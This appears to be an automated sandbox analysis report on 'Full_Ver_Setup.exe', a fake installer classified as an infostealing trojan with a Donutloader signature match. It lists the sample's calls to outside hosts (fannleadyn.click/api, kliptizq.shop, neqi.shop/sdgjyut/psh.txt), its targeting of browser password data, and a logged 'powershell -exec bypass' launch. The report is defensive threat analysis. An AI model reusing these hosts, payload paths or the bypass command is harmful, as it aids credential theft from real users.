                Content-Type: multipart/form-data; boundary=JZQ0PHSKJH649G7IQS3
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 589758
                Host: fannleadyn.click
              Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: application/x-www-form-urlencoded
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 113
                Host: fannleadyn.click
              Source: global traffic | HTTP traffic detected: GET /int_clp_ldr_sha.txt HTTP/1.1
                Connection: Keep-Alive
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Host: kliptizq.shop
              Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global traffic | HTTP traffic detected: GET /int_clp_ldr_sha.txt HTTP/1.1
                Connection: Keep-Alive
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Host: kliptizq.shop
              Source: global traffic | DNS traffic detected: DNS query: fannleadyn.click
              Source: global traffic | DNS traffic detected: DNS query: neqi.shop
              Source: global traffic | DNS traffic detected: DNS query: kliptizq.shop
              Source: unknown | HTTP traffic detected: POST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: application/x-www-form-urlencoded
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 8
                Host: fannleadyn.click
              Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden
                Date: Sun, 22 Dec 2024 22:30:52 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                X-Frame-Options: SAMEORIGIN
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ciOJcKc1CufkB1dLLXzpE4QuZtrOWCP2oBhHllYLCvwB8TZJAeZJsDpWXlGpejCJCj0PokzJOCiz14qRai0K%2B%2BSD1jmspZVSAQ466Ysmj5YYU8i3f5RQ8LB8ubN%2BVUCb"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8f638f1188e30f7d-EWR
              Source: Full_Ver_Setup.exe, 00000000.00000003.1922564633.000000000400D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: Full_Ver_Setup.exe, 00000000.00000003.1922564633.000000000400D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: Full_Ver_Setup.exe, 00000000.00000003.1922564633.000000000400D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: Full_Ver_Setup.exe, 00000000.00000003.1922564633.000000000400D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: Full_Ver_Setup.exe, 00000000.00000003.1922564633.000000000400D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: Full_Ver_Setup.exe, 00000000.00000003.1922564633.000000000400D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: Full_Ver_Setup.exe, 00000000.00000003.1922564633.000000000400D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: Full_Ver_Setup.exe, 00000000.00000003.1922564633.000000000400D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
              Source: Full_Ver_Setup.exe, 00000000.00000003.1922564633.000000000400D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: powershell.exe, 00000004.00000002.2180106835.0000000005431000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: Full_Ver_Setup.exe | String found in binary or memory: http://www.innosetup.com/
              Source: Full_Ver_Setup.exe | String found in binary or memory: http://www.remobjects.com/ps
              Source: Full_Ver_Setup.exe, 00000000.00000003.1922564633.000000000400D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
              Source: Full_Ver_Setup.exe, 00000000.00000003.1922564633.000000000400D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
              Source: Full_Ver_Setup.exe, 00000000.00000003.1874405140.0000000003F4A000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1874719963.0000000003F47000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: powershell.exe, 00000004.00000002.2180106835.0000000005431000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
              Source: Full_Ver_Setup.exe, 00000000.00000003.1874405140.0000000003F4A000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1874719963.0000000003F47000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: Full_Ver_Setup.exe, 00000000.00000003.1874405140.0000000003F4A000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1874719963.0000000003F47000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: Full_Ver_Setup.exe, 00000000.00000003.1874405140.0000000003F4A000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1874719963.0000000003F47000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: Full_Ver_Setup.exe, 00000000.00000003.1874405140.0000000003F4A000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1874719963.0000000003F47000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: Full_Ver_Setup.exe, 00000000.00000003.1874405140.0000000003F4A000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1874719963.0000000003F47000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: Full_Ver_Setup.exe, 00000000.00000003.1874405140.0000000003F4A000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1874719963.0000000003F47000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: Full_Ver_Setup.exe, 00000000.00000003.1971013794.0000000000824000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fannleadyn.click/
              Source: Full_Ver_Setup.exe, 00000000.00000003.1992514646.000000000082A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fannleadyn.click/1X
              Source: Full_Ver_Setup.exe, 00000000.00000003.1873688893.00000000007DD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fannleadyn.click/Y
              Source: Full_Ver_Setup.exe, 00000000.00000003.2012326508.0000000000861000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1922088795.000000000085E000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1946447013.0000000000861000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fannleadyn.click/api
              Source: Full_Ver_Setup.exe, 00000000.00000003.1873688893.00000000007DD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fannleadyn.click/api2
              Source: Full_Ver_Setup.exe, 00000000.00000003.2012801885.0000000000862000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.2012326508.0000000000861000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fannleadyn.click/apiDZ
              Source: Full_Ver_Setup.exe, 00000000.00000002.2174587319.000000000083F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fannleadyn.click/apiF9
              Source: Full_Ver_Setup.exe, 00000000.00000002.2174587319.000000000083F000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1992272379.0000000000843000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fannleadyn.click/apiv
              Source: Full_Ver_Setup.exe, 00000000.00000003.1946447013.000000000082A000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1971013794.0000000000824000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fannleadyn.click/r
              Source: Full_Ver_Setup.exe, 00000000.00000003.1971013794.0000000000832000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1922392393.0000000000832000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.2012249509.0000000000832000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1946447013.0000000000834000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1992514646.0000000000832000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fannleadyn.click/s
              Source: Full_Ver_Setup.exe, 00000000.00000003.1873688893.00000000007DD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fannleadyn.click/x
              Source: Full_Ver_Setup.exe, 00000000.00000003.1900728110.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fannleadyn.click:443/api((
              Source: Full_Ver_Setup.exe, 00000000.00000002.2173229221.0000000000832000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.2012249509.0000000000832000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fannleadyn.click:443/api_PROFILE_STRING=Internet
              Source: Full_Ver_Setup.exe, 00000000.00000002.2173229221.0000000000832000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fannleadyn.click:443/apiell
              Source: Full_Ver_Setup.exe, 00000000.00000002.2174587319.000000000083F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://kliptizq.shop/
              Source: Full_Ver_Setup.exe, 00000000.00000002.2174587319.000000000083F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://kliptizq.shop/int_clp_ldr_sha.txt
              Source: Full_Ver_Setup.exe, 00000000.00000002.2174587319.000000000083F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://kliptizq.shop/int_clp_ldr_sha.txtf1
              Source: Full_Ver_Setup.exe, 00000000.00000002.2173229221.0000000000832000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://kliptizq.shop:443/int_clp_ldr_sha.txtn
              Source: Full_Ver_Setup.exe, 00000000.00000002.2174587319.000000000083F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://neqi.shop/
              Source: Full_Ver_Setup.exe, 00000000.00000002.2174587319.000000000083F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://neqi.shop/Y
              Source: Full_Ver_Setup.exe, 00000000.00000002.2174587319.000000000083F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://neqi.shop/sdgjyut/psh.txt
              Source: Full_Ver_Setup.exe, 00000000.00000002.2174587319.000000000085E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://neqi.shop/sdgjyut/psh.txtY)
              Source: Full_Ver_Setup.exe, 00000000.00000002.2174587319.000000000083F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://neqi.shop/sdgjyut/psh.txtc
              Source: Full_Ver_Setup.exe, 00000000.00000002.2173229221.0000000000832000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://neqi.shop:443/sdgjyut/psh.txt
              Source: Full_Ver_Setup.exe, 00000000.00000003.1875194044.0000000003FA3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.microsof
              Source: Full_Ver_Setup.exe, 00000000.00000003.1923524083.000000000422A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: Full_Ver_Setup.exe, 00000000.00000003.1923524083.000000000422A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: Full_Ver_Setup.exe, 00000000.00000003.1875194044.0000000003FA1000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1875527710.0000000003F55000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: Full_Ver_Setup.exe, 00000000.00000003.1875527710.0000000003F32000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: Full_Ver_Setup.exe, 00000000.00000003.1875194044.0000000003FA1000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1875527710.0000000003F55000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: Full_Ver_Setup.exe, 00000000.00000003.1875527710.0000000003F32000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: powershell.exe, 00000004.00000002.2180106835.0000000005735000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
              Source: powershell.exe, 00000004.00000002.2180106835.00000000057D9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/5xx-error-landinghZ
              Source: powershell.exe, 00000004.00000002.2178588154.000000000344F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2178588154.00000000034D5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2180079470.00000000050E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2179797544.0000000003760000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2184472007.0000000007B59000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/5xx-error-landingid=brand_linktarget=_blank
              Source: powershell.exe, 00000004.00000002.2178588154.0000000003476000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/5xx-error-landingmancet
              Source: powershell.exe, 00000004.00000002.2180106835.00000000057D9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/learning/access-management/phish
              Source: powershell.exe, 00000004.00000002.2180106835.00000000057D9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishhZ
              Source: powershell.exe, 00000004.00000002.2180106835.00000000057D9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-atX)
              Source: powershell.exe, 00000004.00000002.2180106835.0000000005735000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
              Source: powershell.exe, 00000004.00000002.2178588154.000000000344F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2178588154.00000000034D5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2180079470.00000000050E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2179797544.0000000003760000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2184472007.0000000007B59000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/class=cf-btnstyle=background-c
              Source: Full_Ver_Setup.exe, 00000000.00000003.1874405140.0000000003F4A000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1874719963.0000000003F47000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
              Source: Full_Ver_Setup.exe, 00000000.00000003.1874405140.0000000003F4A000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1874719963.0000000003F47000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: Full_Ver_Setup.exe, 00000000.00000003.1923524083.000000000422A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: Full_Ver_Setup.exe, 00000000.00000003.1923524083.000000000422A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: Full_Ver_Setup.exe, 00000000.00000003.1923524083.000000000422A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: Full_Ver_Setup.exe, 00000000.00000003.1923524083.000000000422A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: Full_Ver_Setup.exe, 00000000.00000003.1923524083.000000000422A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknown | Network traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49747 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49748
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49747
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknown | HTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.4:49739 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.4:49741 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.4:49742 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.4:49743 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.4:49744 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 104.21.84.113:443 -> 192.168.2.4:49748 version: TLS 1.2

              System Summary

              Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_0324C989 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,CreateThread,0_2_0324C989
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: String function: 03209816 appears 76 times
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: String function: 03215526 appears 73 times
              Source: Full_Ver_Setup.exeStatic PE information: invalid certificate
              Source: Full_Ver_Setup.exeStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
              Source: Full_Ver_Setup.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
              Source: Full_Ver_Setup.exe, 00000000.00000000.1698059100.000000000053F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs Full_Ver_Setup.exe
              Source: Full_Ver_Setup.exe, 00000000.00000003.1824574336.000000000396D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs Full_Ver_Setup.exe
              Source: Full_Ver_Setup.exeBinary or memory string: OriginalFilenameshfolder.dll~/ vs Full_Ver_Setup.exe
              Source: Full_Ver_Setup.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeProcess created: Commandline size = 4588
              Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/3@3/3
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_03200AD9 CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,0_2_03200AD9
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1432:120:WilError_03
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fs5g2pay.usn.ps1Jump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: Full_Ver_Setup.exe, 00000000.00000003.1900728110.0000000003F01000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: Full_Ver_Setup.exeVirustotal: Detection: 12%
              Source: Full_Ver_Setup.exeString found in binary or memory: -Helper process exited with failure code: 0x%x
              Source: Full_Ver_Setup.exeString found in binary or memory: -HelperRegisterTypeLibrary: StatusCode invalidU
              Source: Full_Ver_Setup.exeString found in binary or memory: /LoadInf=
              Source: Full_Ver_Setup.exeString found in binary or memory: /InstallOnThisVersion: Invalid MinVersion string
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile read: C:\Users\user\Desktop\Full_Ver_Setup.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\Full_Ver_Setup.exe "C:\Users\user\Desktop\Full_Ver_Setup.exe"
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive 
information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="Y0.m3tWOgXwCJmvny1XQKkMDMWzKl6dWzxBD26bzmmI-1734906652-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> <
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: msimg32.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: windows.storage.dllJump to behavior
